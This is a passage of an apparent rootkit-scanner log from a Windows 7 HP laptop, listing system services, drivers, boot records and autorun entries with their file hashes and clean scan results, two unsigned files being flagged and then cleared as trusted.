21:57:32.0549 0x1a10 Themes - ok
21:57:32.0599 0x1a10 [ E40E80D0304A73E8D269F7141D77250B, 0DB4AC13A264F19A84DC0BCED54E8E404014CC09C993B172002B1561EC7E265A ] THREADORDER C:\Windows\system32\mmcss.dll
21:57:32.0659 0x1a10 THREADORDER - ok
21:57:32.0709 0x1a10 [ 7E7AFD841694F6AC397E99D75CEAD49D, DE87F203FD8E6BDCCFCA1860A85F283301A365846FB703D9BB86278D8AC96B07 ] TrkWks C:\Windows\System32\trkwks.dll
21:57:32.0779 0x1a10 TrkWks - ok
21:57:32.0859 0x1a10 [ 773212B2AAA24C1E31F10246B15B276C, F2EF85F5ABA307976D9C649D710B408952089458DDE97D4DEF321DF14E46A046 ] TrustedInstaller C:\Windows\servicing\TrustedInstaller.exe
21:57:32.0959 0x1a10 TrustedInstaller - ok
21:57:33.0019 0x1a10 [ 19BEDA57F3E0A06B8D5EB6D619BD5624, 952D5FAFD662C93628C12A6F7EB8E240A44216C0A15CBD2F5016BC357CBFE821 ] tssecsrv C:\Windows\system32\DRIVERS\tssecsrv.sys
21:57:33.0179 0x1a10 tssecsrv - ok
21:57:33.0249 0x1a10 [ E9981ECE8D894CEF7038FD1D040EB426, DCDDCE933CAECE8180A3447199B07F2F0413704EEC1A09606EE357901A84A7CF ] TsUsbFlt C:\Windows\system32\drivers\tsusbflt.sys
21:57:33.0299 0x1a10 TsUsbFlt - ok
21:57:33.0369 0x1a10 [ AD64450A4ABE076F5CB34CC08EEACB07, B5C386635441A19178E7FEEE299BA430C8D72F9110866C13A216B12A1080AD12 ] TsUsbGD C:\Windows\system32\drivers\TsUsbGD.sys
21:57:33.0449 0x1a10 TsUsbGD - ok
21:57:33.0489 0x1a10 [ 3566A8DAAFA27AF944F5D705EAA64894, AE9D8B648DA08AF667B9456C3FE315489859C157510A258559F18238F2CC92B8 ] tunnel C:\Windows\system32\DRIVERS\tunnel.sys
21:57:33.0549 0x1a10 tunnel - ok
21:57:33.0589 0x1a10 [ B4DD609BD7E282BFC683CEC7EAAAAD67, EF131DB6F6411CAD36A989A421AF93F89DD61601AC524D2FF11C10FF6E3E9123 ] uagp35 C:\Windows\system32\drivers\uagp35.sys
21:57:33.0619 0x1a10 uagp35 - ok
21:57:33.0649 0x1a10 [ FF4232A1A64012BAA1FD97C7B67DF593, D8591B4EB056899C7B604E4DD852D82D4D9809F508ABCED4A03E1BE6D5D456E3 ] udfs C:\Windows\system32\DRIVERS\udfs.sys
21:57:33.0729 0x1a10 udfs - ok
21:57:33.0779 0x1a10 [ 3CBDEC8D06B9968ABA702EBA076364A1, B8DAB8AA804FC23021BFEBD7AE4D40FBE648D6C6BA21CC008E26D1C084972F9B ] UI0Detect C:\Windows\system32\UI0Detect.exe
21:57:33.0859 0x1a10 UI0Detect - ok
21:57:33.0909 0x1a10 [ 4BFE1BC28391222894CBF1E7D0E42320, 5918B1ED2030600DF77BDACF1C808DF6EADDD8BF3E7003AF1D72050D8B102B3A ] uliagpkx C:\Windows\system32\drivers\uliagpkx.sys
21:57:33.0949 0x1a10 uliagpkx - ok
21:57:34.0025 0x1a10 [ DC54A574663A895C8763AF0FA1FF7561, 09A3F3597E91CBEB2F38E96E75134312B60CAE5574B2AD4606C2D3E992AEDDFE ] umbus C:\Windows\system32\DRIVERS\umbus.sys
21:57:34.0090 0x1a10 umbus - ok
21:57:34.0149 0x1a10 [ B2E8E8CB557B156DA5493BBDDCC1474D, F547509A08C0679ACB843E20C9C0CF51BED1B06530BBC529DFB0944504564A43 ] UmPass C:\Windows\system32\drivers\umpass.sys
21:57:34.0197 0x1a10 UmPass - ok
21:57:34.0253 0x1a10 [ A293DCD756D04D8492A750D03B9A297C, 203600ED0B7F8BA4C6D6F4ED810F4DF5AB70928B06EC4131C5D8ADF628444ED1 ] UmRdpService C:\Windows\System32\umrdp.dll
21:57:34.0312 0x1a10 UmRdpService - ok
21:57:34.0404 0x1a10 [ 9DC07E73A4ABB9ACF692113B36A5009F, CA7176FC219515D58DCFA66EC61880ECE5617275C9B83701BB74D8B60E733D34 ] UnlockerDriver5 C:\projects\Unlocker\UnlockerDriver5.sys
21:57:34.0429 0x1a10 UnlockerDriver5 - ok
21:57:34.0499 0x1a10 [ D47EC6A8E81633DD18D2436B19BAF6DE, 0FB461E2D5E0B75BB5958F6362F4880BFA4C36AD930542609BCAF574941AA7AE ] upnphost C:\Windows\System32\upnphost.dll
21:57:34.0602 0x1a10 upnphost - ok
21:57:34.0681 0x1a10 [ B0435098C81D04CAFFF80DDB746CD3A2, A17B207740382E38729571F0B0BC98FF874E856A7C7CE9EB930328A2AD88F52A ] usbaudio C:\Windows\system32\drivers\usbaudio.sys
21:57:34.0741 0x1a10 usbaudio - ok
21:57:34.0790 0x1a10 [ 28B81917A195B67617AF7DCF4DFE5736, 40A4D2AAE1BDE5ABA8708ED150396E913C566ECD5CDA40D6C6DB256F1B9FD4A9 ] usbccgp C:\Windows\system32\drivers\usbccgp.sys
21:57:34.0930 0x1a10 usbccgp - ok
21:57:35.0007 0x1a10 [ 80B0F7D5CCF86CEB5D402EAAF61FEC31, 140C62116A425DEAD25FE8D82DE283BC92C482A9F643658D512F9F67061F28AD ] usbcir C:\Windows\system32\drivers\usbcir.sys
21:57:35.0095 0x1a10 usbcir - ok
21:57:35.0149 0x1a10 [ B626F048318DAE65A3317F0592BE592C, 284D8FFE1D35F852EFDA182A72288AC3A10D6ED825FE2CC5812497D3FE291AF1 ] usbehci C:\Windows\system32\drivers\usbehci.sys
21:57:35.0252 0x1a10 usbehci - ok
21:57:35.0319 0x1a10 [ 390109E8E05BA00375DCB1ED64DC60AF, B8628502590B423BEFB6F7C8C69FAD0667AD0746FF6B444EE02016E8E1052B78 ] usbhub C:\Windows\system32\drivers\usbhub.sys
21:57:35.0416 0x1a10 usbhub - ok
21:57:35.0486 0x1a10 [ B4DF0F4C1D9D25DFE1DAD1D8670F1D4F, 4317C2DEDC639527B53864BAEC46CBE022D298C0503E29E1072DD1C851D92BFC ] usbohci C:\Windows\system32\drivers\usbohci.sys
21:57:35.0603 0x1a10 usbohci - ok
21:57:35.0654 0x1a10 [ 73188F58FB384E75C4063D29413CEE3D, B485463933306036B1D490722CB1674DC85670753D79FA0EF7EBCA7BBAAD9F7C ] usbprint C:\Windows\system32\drivers\usbprint.sys
21:57:35.0704 0x1a10 usbprint - ok
21:57:35.0753 0x1a10 [ D029DD09E22EB24318A8FC3D8138BA43, C95805E8BF75ECB939520AE86420B16467B0771C161C51C9F1A37649ADFADCD0 ] USBSTOR C:\Windows\system32\DRIVERS\USBSTOR.SYS
21:57:35.0820 0x1a10 USBSTOR - ok
21:57:35.0865 0x1a10 [ CFEAAF96E666E3DCBD8F6DFF516784AE, 006218A3DB5851790CC0A7F3DCD7B3AF82F624DA679296DE507AFD36C5468317 ] usbuhci C:\Windows\system32\drivers\usbuhci.sys
21:57:35.0936 0x1a10 usbuhci - ok
21:57:35.0998 0x1a10 [ 1F775DA4CF1A3A1834207E975A72E9D7, 6D3DE5BD3EF3A76E997E5BAF900C51D25308F5A9682D1F62017F577A24095B90 ] usbvideo C:\Windows\system32\Drivers\usbvideo.sys
21:57:36.0171 0x1a10 usbvideo - ok
21:57:36.0196 0x1a10 [ EDBB23CBCF2CDF727D64FF9B51A6070E, 7202484C8E1BFB2AFD64D8C81668F3EDE0E3BF5EB27572877A0A7B337AE5AE42 ] UxSms C:\Windows\System32\uxsms.dll
21:57:36.0254 0x1a10 UxSms - ok
21:57:36.0294 0x1a10 [ ED5B573D3D276BE950A33139F7302F69, 2135A7DFDDC673F1F8122DF8ABA567B9F010DA2ADE1B60D0EE48457ABDB2C142 ] valWBFPolicyService C:\Windows\system32\valWBFPolicyService.exe
21:57:36.0324 0x1a10 valWBFPolicyService - detected UnsignedFile.Multi.Generic ( 1 )
21:57:36.0898 0x1a10 Detect skipped due to KSN trusted
21:57:36.0898 0x1a10 valWBFPolicyService - ok
21:57:36.0928 0x1a10 [ 00A54A6CEDF599AABB72C20E0815BC37, 09835A43E1A17396BDC88BB38EF66EA8854913040347D9893EBF8550D0AA1452 ] VaultSvc C:\Windows\system32\lsass.exe
21:57:36.0958 0x1a10 VaultSvc - ok
21:57:37.0048 0x1a10 [ 87640B7EDD84E7F6D3C68A7BD2EB067B, 70AE7AAC17216C771908A1CFC0581F9C7DDC2D9C547A8D5203CFE73BF6216F09 ] VBoxDrv C:\Windows\system32\DRIVERS\VBoxDrv.sys
21:57:37.0108 0x1a10 VBoxDrv - ok
21:57:37.0138 0x1a10 [ 20F72733A3BACAE4A05C402DDB46BE31, F0DE313D54803745DE45E98BA2687DA5D004EEC74143C8BACC99A4A67335CF57 ] VBoxNetAdp C:\Windows\system32\DRIVERS\VBoxNetAdp.sys
21:57:37.0168 0x1a10 VBoxNetAdp - ok
21:57:37.0209 0x1a10 [ 443FD6C314F71B63D3C27461AB43510F, BC9A07ECA75B3354100099947FEC41AB6C9B71A65DED46263D248BEED9722C28 ] VBoxNetFlt C:\Windows\system32\DRIVERS\VBoxNetFlt.sys
21:57:37.0239 0x1a10 VBoxNetFlt - ok
21:57:37.0314 0x1a10 [ 5379DB8F681E7A91B3A454AA5153C31D, D935475CAA37374F8990B4F197300A379B2A931F3852C1DB61E7DF8332719520 ] VBoxUSBMon C:\Windows\system32\DRIVERS\VBoxUSBMon.sys
21:57:37.0354 0x1a10 VBoxUSBMon - ok
21:57:37.0394 0x1a10 [ C5C876CCFC083FF3B128F933823E87BD, 6FE0FBB6C3207E09300E0789E2168F76668D87C317FE9F263E733827ADCFBE0D ] vdrvroot C:\Windows\system32\drivers\vdrvroot.sys
21:57:37.0424 0x1a10 vdrvroot - ok
21:57:37.0494 0x1a10 [ 8D6B481601D01A456E75C3210F1830BE, A2CEF483F4231367138EEF7E67FD5BE5364FC0780C44CA1368E36CE4AA3D0633 ] vds C:\Windows\System32\vds.exe
21:57:37.0574 0x1a10 vds - ok
21:57:37.0604 0x1a10 [ DA4DA3F5E02943C2DC8C6ED875DE68DD, EDE604536DB78C512D68C92B26DA77C8811AC109D1F0A473673F0A82D15A2838 ] vga C:\Windows\system32\DRIVERS\vgapnp.sys
21:57:37.0644 0x1a10 vga - ok
21:57:37.0654 0x1a10 [ 53E92A310193CB3C03BEA963DE7D9CFC, 45898604375B42EB1246C17A22D91C2440F11C746FF6459AD38027C1BC2E3125 ] VgaSave C:\Windows\System32\drivers\vga.sys
21:57:37.0734 0x1a10 VgaSave - ok
21:57:37.0766 0x1a10 [ 2CE2DF28C83AEAF30084E1B1EB253CBB, D1946816A1CB89F825CBEA58F94A4C9D0CE7249355CD3915563F54054EE564BF ] vhdmp C:\Windows\system32\drivers\vhdmp.sys
21:57:37.0806 0x1a10 vhdmp - ok
21:57:37.0823 0x1a10 [ E5689D93FFE4E5D66C0178761240DD54, 6D35CED80681B12AAF63BFA0DA1C386E71D3838839B68A686990AA8031949D27 ] viaide C:\Windows\system32\drivers\viaide.sys
21:57:37.0843 0x1a10 viaide - ok
21:57:37.0906 0x1a10 [ 86EA3E79AE350FEA5331A1303054005F, 7E7D6027EB41E591633C7383A5D29A3BA8ECFC08C177D2BCF741EE27686B1691 ] vmbus C:\Windows\system32\drivers\vmbus.sys
21:57:37.0937 0x1a10 vmbus - ok
21:57:37.0967 0x1a10 [ 7DE90B48F210D29649380545DB45A187, 09522F84285D62B961868DA98C40B82E746CA4D24A9780905673A2349D6B07F4 ] VMBusHID C:\Windows\system32\drivers\VMBusHID.sys
21:57:37.0997 0x1a10 VMBusHID - ok
21:57:38.0065 0x1a10 [ D2AAFD421940F640B407AEFAAEBD91B0, 31EF342A60AF04F4108759A71F8FB7B8C8819216CF3D16A95B2BA0E33A8A9161 ] volmgr C:\Windows\system32\drivers\volmgr.sys
21:57:38.0093 0x1a10 volmgr - ok
21:57:38.0317 0x1a10 [ 85C5468BC395819AE2A0C747334BA14C, 75EB4751F90F3347229442A5622539383CE0B1834EE7B995260D0D433BA2E25F ] volmgrx C:\Windows\system32\drivers\volmgrx.sys
21:57:38.0354 0x1a10 volmgrx - ok
21:57:38.0388 0x1a10 [ DF8126BD41180351A093A3AD2FC8903B, AEFF4AA89CDDAAAD43CDE17C6B6EB2A397A0AC1651CBD51B889161EC2BC6527A ] volsnap C:\Windows\system32\drivers\volsnap.sys
21:57:38.0424 0x1a10 volsnap - ok
21:57:38.0474 0x1a10 [ B4A73CA4EF9A02B9738CEA9AD5FE5917, B6A8086189FE2F1C3FE5B3F484FBA3DB2E5E1836F3154D30090F136C27D16166 ] vpcbus C:\Windows\system32\drivers\vpchbus.sys
21:57:38.0508 0x1a10 vpcbus - ok
21:57:38.0540 0x1a10 [ E675FB2B48C54F09895482E2253B289C, 68BBFBF2356C849722E429CA753CC309A3CCE8CF00EBDBBD2695ECD292324DF2 ] vpcnfltr C:\Windows\system32\DRIVERS\vpcnfltr.sys
21:57:38.0601 0x1a10 vpcnfltr - ok
21:57:38.0627 0x1a10 [ 5FB42082B0D19A0268705F1DD343DF20, 62F8EEE6A507CE6A8BD638020118D71B78332F79BA82654AB702AE46B04767D9 ] vpcusb C:\Windows\system32\DRIVERS\vpcusb.sys
21:57:38.0734 0x1a10 vpcusb - ok
21:57:38.0788 0x1a10 [ 207B6539799CC1C112661A9B620DD233, 6B915CC7F77C867516D94865D7BF2E5C815402EF0A4488C3EB2FEF7CFA6C98F6 ] vpcvmm C:\Windows\system32\drivers\vpcvmm.sys
21:57:38.0831 0x1a10 vpcvmm - ok
21:57:38.0861 0x1a10 [ 5E2016EA6EBACA03C04FEAC5F330D997, 53106EB877459FE55A459111F7AB0EE320BB3B4C954D3DB6FA1642396001F2AC ] vsmraid C:\Windows\system32\drivers\vsmraid.sys
21:57:38.0893 0x1a10 vsmraid - ok
21:57:38.0969 0x1a10 [ B60BA0BC31B0CB414593E169F6F21CC2, 47B801E623254CF0202B3591CB5C019CABFB52F123C7D47E29D19B32F1F2B915 ] VSS C:\Windows\system32\vssvc.exe
21:57:39.0084 0x1a10 VSS - ok
21:57:39.0247 0x1a10 [ BE6C456AE7620B86A7273CBD11A3D450, DEBBB12CB9771722D8258FDF9ECC4ED035BD7090371A975928D11F6B9EDC0C59 ] VSStandardCollectorService140 C:\Program Files (x86)\Microsoft Visual Studio 14.0\Team Tools\DiagnosticsHub\Collector\StandardCollector.Service.exe
21:57:39.0278 0x1a10 VSStandardCollectorService140 - ok
21:57:39.0304 0x1a10 [ 36D4720B72B5C5D9CB2B9C29E9DF67A1, 3254523C85C70EBA2DBAC05DB2DBA89EDF8E9195F390F7C21F96458FB6B2E3D7 ] vwifibus C:\Windows\system32\DRIVERS\vwifibus.sys
21:57:39.0344 0x1a10 vwifibus - ok
21:57:39.0385 0x1a10 [ 6A3D66263414FF0D6FA754C646612F3F, 30F6BA594B0D3B94113064015A16D97811CD989DF1715CCE21CEAB9894C1B4FB ] vwififlt C:\Windows\system32\DRIVERS\vwififlt.sys
21:57:39.0431 0x1a10 vwififlt - ok
21:57:39.0486 0x1a10 [ 6A638FC4BFDDC4D9B186C28C91BD1A01, 5521F1DC515586777EC4837E0AEAA3E613CC178AF1074031C4D0D0C695A93168 ] vwifimp C:\Windows\system32\DRIVERS\vwifimp.sys
21:57:39.0523 0x1a10 vwifimp - ok
21:57:39.0553 0x1a10 [ 1C9D80CC3849B3788048078C26486E1A, 34A89F31E53F6B6C209B286F580CC2257AE6D057E4E20741F241C9C167947962 ] W32Time C:\Windows\system32\w32time.dll
21:57:39.0629 0x1a10 W32Time - ok
21:57:39.0666 0x1a10 [ 4E9440F4F152A7B944CB1663D3935A3E, 8FE04EBD3BC612EE943A21A3E56F37E5C9B578CDACA6044048181DAD81816D53 ] WacomPen C:\Windows\system32\drivers\wacompen.sys
21:57:39.0697 0x1a10 WacomPen - ok
21:57:39.0738 0x1a10 [ 356AFD78A6ED4457169241AC3965230C, CE4D1EE3525C10AC658B20776C3E444DE44874C837713DC5311386EDFCB18399 ] WANARP C:\Windows\system32\DRIVERS\wanarp.sys
21:57:39.0814 0x1a10 WANARP - ok
21:57:39.0825 0x1a10 [ 356AFD78A6ED4457169241AC3965230C, CE4D1EE3525C10AC658B20776C3E444DE44874C837713DC5311386EDFCB18399 ] Wanarpv6 C:\Windows\system32\DRIVERS\wanarp.sys
21:57:39.0886 0x1a10 Wanarpv6 - ok
21:57:39.0991 0x1a10 [ 78F4E7F5C56CB9716238EB57DA4B6A75, 46A4E78CE5F2A4B26F4E9C3FF04A99D9B727A82AC2E390A82A1611C3F6E0C9AF ] wbengine C:\Windows\system32\wbengine.exe
21:57:40.0110 0x1a10 wbengine - ok
21:57:40.0141 0x1a10 [ 3AA101E8EDAB2DB4131333F4325C76A3, 4F7BD3DA5E58B18BFF106CFF7B45E75FD13EE556D433C695BA23EC80827E49DE ] WbioSrvc C:\Windows\System32\wbiosrvc.dll
21:57:40.0201 0x1a10 WbioSrvc - ok
21:57:40.0244 0x1a10 [ 7368A2AFD46E5A4481D1DE9D14848EDD, 8039C478FC2D9F095F5883A4FA47F9E6EDF57CC88A4AA74F07C88445F90DED57 ] wcncsvc C:\Windows\System32\wcncsvc.dll
21:57:40.0314 0x1a10 wcncsvc - ok
21:57:40.0374 0x1a10 [ BC00873272B3771CCDA38336AF2B4D4B, 3E412DEC5F172B4C5FD5C227CD790EE56B90A00A8B538704E8F973D230BE2289 ] WcsPlugInService C:\Windows\System32\WcsPlugInService.dll
21:57:40.0472 0x1a10 WcsPlugInService - ok
21:57:40.0513 0x1a10 [ 72889E16FF12BA0F235467D6091B17DC, F2FD0BBD075E33608D93F350D216F97442AB89ABD540513C2D568C78096E12A8 ] Wd C:\Windows\system32\drivers\wd.sys
21:57:40.0539 0x1a10 Wd - ok
21:57:40.0618 0x1a10 [ E2C933EDBC389386EBE6D2BA953F43D8, AF1DEADD5F1267CCEBD226E8EEB971D1946EA6A5A9645A36F5D111F758AF2F07 ] Wdf01000 C:\Windows\system32\drivers\Wdf01000.sys
21:57:40.0673 0x1a10 Wdf01000 - ok
21:57:40.0734 0x1a10 [ C6F7473B55510F0B93961DA03D8E3B38, 4BAB9274DED8F7AC4A52B8739F501323FFFA0367CAA24BFAFDB5523812E0CE39 ] WdiServiceHost C:\Windows\system32\wdi.dll
21:57:40.0813 0x1a10 WdiServiceHost - ok
21:57:40.0821 0x1a10 [ C6F7473B55510F0B93961DA03D8E3B38, 4BAB9274DED8F7AC4A52B8739F501323FFFA0367CAA24BFAFDB5523812E0CE39 ] WdiSystemHost C:\Windows\system32\wdi.dll
21:57:40.0856 0x1a10 WdiSystemHost - ok
21:57:40.0897 0x1a10 [ EE841B6D1F2B9508D3ABAE52AC05A94F, F1AE981FCDBFC4672A4EABABD41382E93762EFC2EDAD96E75530E7ACA5AF1FD8 ] WebClient C:\Windows\System32\webclnt.dll
21:57:41.0040 0x1a10 WebClient - ok
21:57:41.0078 0x1a10 [ C749025A679C5103E575E3B48E092C43, B71171D07EE7AB085A24BF3A1072FF2CE7EA021AAE695F6A90640E6EE8EB55C1 ] Wecsvc C:\Windows\system32\wecsvc.dll
21:57:41.0166 0x1a10 Wecsvc - ok
21:57:41.0190 0x1a10 [ 7E591867422DC788B9E5BD337A669A08, 484E6BCCDF7ADCE9A1AACAD1BC7C7D7694B9E40FA90D94B14D80C607784F6C75 ] wercplsupport C:\Windows\System32\wercplsupport.dll
21:57:41.0284 0x1a10 wercplsupport - ok
21:57:41.0314 0x1a10 [ 6D137963730144698CBD10F202E9F251, A9F522A125158D94F540544CCD4DBF47B9DCE2EA878C33675AFE40F80E8F4979 ] WerSvc C:\Windows\System32\WerSvc.dll
21:57:41.0388 0x1a10 WerSvc - ok
21:57:41.0426 0x1a10 [ 611B23304BF067451A9FDEE01FBDD725, 0AF2734B978165FC6FD22B64862132CCE32528A21C698A49D176129446E099C8 ] WfpLwf C:\Windows\system32\DRIVERS\wfplwf.sys
21:57:41.0487 0x1a10 WfpLwf - ok
21:57:41.0531 0x1a10 [ 05ECAEC3E4529A7153B3136CEB49F0EC, 9995CB2CEC70A633EA33CBB0DEAD2BB28CB67132B41E9444BDAB9E75744C9A50 ] WIMMount C:\Windows\system32\drivers\wimmount.sys
21:57:41.0558 0x1a10 WIMMount - ok
21:57:41.0598 0x1a10 WinDefend - ok
21:57:41.0611 0x1a10 WinHttpAutoProxySvc - ok
21:57:41.0668 0x1a10 [ 19B07E7E8915D701225DA41CB3877306, D6555E8D276DBB11358246E0FE215F76F1FB358791C76B88D82C2A66A42DA19F ] Winmgmt C:\Windows\system32\wbem\WMIsvc.dll
21:57:41.0740 0x1a10 Winmgmt - ok
21:57:41.0842 0x1a10 [ EBDA1B0F15CB9B2CBCC6C94824E4E054, C51314F7D611E4903DA00EFA8EB99365414436324D256083CE0B5A8E055E8E06 ] WinRM C:\Windows\system32\WsmSvc.dll
21:57:42.0021 0x1a10 WinRM - ok
21:57:42.0085 0x1a10 [ FE88B288356E7B47B74B13372ADD906D, A16B166F6BB32EF9D2A142F27B9EC54CBC7B3AC915799783CF4C40E525BC9E03 ] WinUsb C:\Windows\system32\DRIVERS\WinUSB.sys
21:57:42.0119 0x1a10 WinUsb - ok
21:57:42.0175 0x1a10 [ 4FADA86E62F18A1B2F42BA18AE24E6AA, CE1683386886BF34862681A46199EA7E7FB4232A186047DA7FBD8EC240AF6726 ] Wlansvc C:\Windows\System32\wlansvc.dll
21:57:42.0265 0x1a10 Wlansvc - ok
21:57:42.0425 0x1a10 [ 357CABBF155AFD1D3926E62539D2A3A7, C43CFF84E7D930B4999DC061AB0766B57AAD7540B3E6EE54605B10ECE90825F5 ] wlidsvc C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
21:57:42.0522 0x1a10 wlidsvc - ok
21:57:42.0554 0x1a10 [ F6FF8944478594D0E414D3F048F0D778, 6F75E0AE6127B33A92A88E59D4B048FD4C15F997807BE7BF0EFE76F95235B1D9 ] WmiAcpi C:\Windows\system32\drivers\wmiacpi.sys
21:57:42.0585 0x1a10 WmiAcpi - ok
21:57:42.0663 0x1a10 [ 38B84C94C5A8AF291ADFEA478AE54F93, 1AC267AC73670BEA5F3785C9AD9DB146F8E993A862C843742B21FDB90D102B2A ] wmiApSrv C:\Windows\system32\wbem\WmiApSrv.exe
21:57:42.0713 0x1a10 wmiApSrv - ok
21:57:42.0753 0x1a10 WMPNetworkSvc - ok
21:57:42.0778 0x1a10 [ 96C6E7100D724C69FCF9E7BF590D1DCA, 2E63C9B0893B4FC03B7A71BAEA6202D3D3DB1B52F3643467829B5A573FD7655B ] WPCSvc C:\Windows\System32\wpcsvc.dll
21:57:42.0830 0x1a10 WPCSvc - ok
21:57:42.0853 0x1a10 [ 93221146D4EBBF314C29B23CD6CC391D, C0750858A65BF51E210CD244C825C121D67E025CD2D2455139991AAC289A90FE ] WPDBusEnum C:\Windows\system32\wpdbusenum.dll
21:57:42.0914 0x1a10 WPDBusEnum - ok
21:57:42.0961 0x1a10 [ 6BCC1D7D2FD2453957C5479A32364E52, E48554D31FBDCF8F985C1C72524CAA9106F5B7CC2B79064F8F5E2562D517F090 ] ws2ifsl C:\Windows\system32\drivers\ws2ifsl.sys
21:57:43.0030 0x1a10 ws2ifsl - ok
21:57:43.0065 0x1a10 [ E8B1FE6669397D1772D8196DF0E57A9E, 39FE0819360719F756BD31A1884A0508A1E2371ACC723E25E005CBEC0A7B02FA ] wscsvc C:\Windows\System32\wscsvc.dll
21:57:43.0114 0x1a10 wscsvc - ok
21:57:43.0121 0x1a10 WSearch - ok
21:57:43.0281 0x1a10 [ 88009DB9E1166B6B6713A858C176FECD, CBF4C63D3C5D14AF3C3F0D9C48E5AC9E7A4323BFB0363E9948FD801963BE1467 ] wuauserv C:\Windows\system32\wuaueng.dll
21:57:43.0440 0x1a10 wuauserv - ok
21:57:43.0483 0x1a10 [ AB886378EEB55C6C75B4F2D14B6C869F, D6C4602EB8F291DADEDF3CD211013D4AC752DDE7E799C2D8D74AA4F5477CAED6 ] WudfPf C:\Windows\system32\drivers\WudfPf.sys
21:57:43.0530 0x1a10 WudfPf - ok
21:57:43.0563 0x1a10 [ DDA4CAF29D8C0A297F886BFE561E6659, 94E5DD649B5D86FA1A7C7D30FCF9644D0EE048D312E626111458ADF66BFBE978 ] WUDFRd C:\Windows\system32\DRIVERS\WUDFRd.sys
21:57:43.0614 0x1a10 WUDFRd - ok
21:57:43.0649 0x1a10 [ B20F051B03A966392364C83F009F7D17, 88ECEB55AE91F58F592B96EBC10B572747D5A2F9B7629E8F371761E4F7408A65 ] wudfsvc C:\Windows\System32\WUDFSvc.dll
21:57:43.0693 0x1a10 wudfsvc - ok
21:57:43.0742 0x1a10 [ 04F82965C09CBDF646B487E145060301, 2CD8533EDBE24C3E42EB7550E20F8A2EB9E5E345B165DEF543163A6BC1FDD18B ] WwanSvc C:\Windows\System32\wwansvc.dll
21:57:43.0799 0x1a10 WwanSvc - ok
21:57:43.0882 0x1a10 ================ Scan global ===============================
21:57:43.0901 0x1a10 [ 168EA9CD9BD6056BB6F60B57D5304BBE, 5A2F98754F042A7D80E7483842967EB362F01D57CE9720B24C7EDAA047F24C6F ] C:\Windows\system32\basesrv.dll
21:57:43.0943 0x1a10 [ 100788FE26FF7A1E530DD2A7ABE855F1, 64FDD30D7986AB41E0A545558AB8F93D5B1AEDF5ACE4F40B9C7B1FB3A59442AA ] C:\Windows\system32\winsrv.dll
21:57:43.0987 0x1a10 [ 100788FE26FF7A1E530DD2A7ABE855F1, 64FDD30D7986AB41E0A545558AB8F93D5B1AEDF5ACE4F40B9C7B1FB3A59442AA ] C:\Windows\system32\winsrv.dll
21:57:44.0024 0x1a10 [ D6160F9D869BA3AF0B787F971DB56368, 0033E6212DD8683E4EE611B290931FDB227B4795F0B17C309DC686C696790529 ] C:\Windows\system32\sxssrv.dll
21:57:44.0053 0x1a10 [ 71C85477DF9347FE8E7BC55768473FCA, A86D6A6D1F5A0EFCD649792A06F3AE9B37158D48493D2ECA7F52DCC1CB9B6536 ] C:\Windows\system32\services.exe
21:57:44.0064 0x1a10 [ Global ] - ok
21:57:44.0065 0x1a10 ================ Scan MBR ==================================
21:57:44.0081 0x1a10 [ A36C5E4F47E84449FF07ED3517B43A31 ] \Device\Harddisk0\DR0
21:57:44.0330 0x1a10 \Device\Harddisk0\DR0 - ok
21:57:44.0331 0x1a10 ================ Scan VBR ==================================
21:57:44.0342 0x1a10 [ 04D41694496FA4ECA64A00A565FC60E0 ] \Device\Harddisk0\DR0\Partition1
21:57:44.0344 0x1a10 \Device\Harddisk0\DR0\Partition1 - ok
21:57:44.0348 0x1a10 [ D4FB2BC6D3C50D0FBCDC64AE579D412A ] \Device\Harddisk0\DR0\Partition2
21:57:44.0350 0x1a10 \Device\Harddisk0\DR0\Partition2 - ok
21:57:44.0357 0x1a10 [ 70F217D8BCDAE04538AC7579C0FC2AC0 ] \Device\Harddisk0\DR0\Partition3
21:57:44.0359 0x1a10 \Device\Harddisk0\DR0\Partition3 - ok
21:57:44.0365 0x1a10 [ E37218F946EDA4769414F09058FD221E ] \Device\Harddisk0\DR0\Partition4
21:57:44.0366 0x1a10 \Device\Harddisk0\DR0\Partition4 - ok
21:57:44.0368 0x1a10 ================ Scan generic autorun ======================
21:57:44.0449 0x1a10 [ 053C93D5967E08748DBA0E132EAEC0B3, B48A00B00DFDFCF6911911B34788CD359BF90AB66F4A2A3FE177B75EB775C2C2 ] C:\Program Files (x86)\ATI Technologies\AMDUSB3DeviceDetector\nusb3mon.exe
21:57:44.0460 0x1a10 NUSB3MON - detected UnsignedFile.Multi.Generic ( 1 )
21:57:45.0067 0x1a10 Detect skipped due to KSN trusted
21:57:45.0067 0x1a10 NUSB3MON - ok
21:57:45.0364 0x1a10 [ 074B2C777090821E020B404AF5BF97AD, 26DF9B3A153B2BCB6ED4DBB66CC9429790854095439119A618B05ECEBFB31F12 ] C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
21:57:45.0619 0x1a10 RTHDVCPL - ok
21:57:45.0768 0x1a10 [ 7A727248EBC065BD2BB94A9B2892D190, B1E12ED3D07963EF0FA09B3ECD8AC3FBD316733D968A99C958DF7026B1BDFD99 ] c:\Program Files\Microsoft Security Client\msseces.exe
21:57:45.0843 0x1a10 MSC - ok
21:57:45.0847 0x1a10 SynTPEnh - ok
21:57:45.0910 0x1a10 [ A0FA8D8D7AF03BC5D77436D6F807E397, 817978E2183AC509BB877935660CD9436AF7C70ED8A94FC93426AF3DC9EC0127 ] C:\Program Files (x86)\Hewlett-Packard\HP 3D DriveGuard\AccelerometerST.exe
21:57:45.0939 0x1a10 AccelerometerSysTrayApplet - ok
21:57:45.0992 0x1a10 [ 6198A9BC15ED77F318D5DDD1918CF1D1, 6C7E619BB053F09021F5867E3A70A3A2890E2318CF1A5CE294A5F894CB3A4890 ] C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
21:57:46.0031 0x1a10 HP Quick Launch - ok
21:57:46.0085 0x1a10 [ FCEC6F664FA7E5FE323165FBC9314470, 4E5AB1E6C3D2881D95E74F2F28649A7DBC4919CA249829A0E4CD9804E401A025 ] C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
21:57:46.0129 0x1a10 SunJavaUpdateSched - ok
21:57:46.0162 0x1a10 [ C06484BCD75F743FA2671A96EB47B28C, F17BDE8C4F9A0930BD423B4E4334F3916F47C54A78D8C799FB641196B6F18833 ] C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe
21:57:46.0198 0x1a10 HPOSD - ok
